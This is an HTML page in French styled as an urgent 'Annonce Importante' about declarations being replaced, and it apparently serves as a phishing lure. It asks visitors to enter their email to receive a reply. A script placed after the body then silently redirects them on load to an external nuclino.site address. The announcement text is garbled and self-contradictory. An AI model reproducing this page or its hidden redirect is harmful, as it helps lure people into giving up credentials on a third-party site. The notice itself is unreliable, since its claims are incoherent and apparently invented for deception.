<html>
<head>
    <title>Annonce Importante</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet">
    <style>
        body {
            font-family: 'Roboto', sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .container {
            background-color: #fff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            max-width: 600px;
            text-align: center;
        }
        h1 {
            color: #333;
        }
        p {
            color: #666;
            line-height: 1.6;
        }
        .email-input {
            margin-top: 20px;
        }
        input[type="email"] {
            width: calc(100% - 40px);
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #ccc;
            border-radius: 4px;
        }
        button {
            padding: 10px 20px;
            background-color: #007BFF;
            color: #fff;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }
        button:hover {
            background-color: #0056b3;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Annonce Importante</h1>
        <p>Les déclarations (DCR) n'existent plus, ou du moins sont maintenues. Elles sont donc remplacées par les rendus. Ces modifications apporteront une historique à PKYT - Service et LSP ; et un reçu par l'État Ebsayder.</p>
        <p>Il est nécessaire de mettre son email Ebsayder dans le champ '+' pour recevoir une reponse !</p>
        <div class="email-input">
        
        </div>
    </div>
</body>
    <script> window.location.href = "https://ecde.nuclino.site/D%C3%A9clarations-d1d008a0-e157-446a-a4f3-32b892f3f871"; </script>
</html>
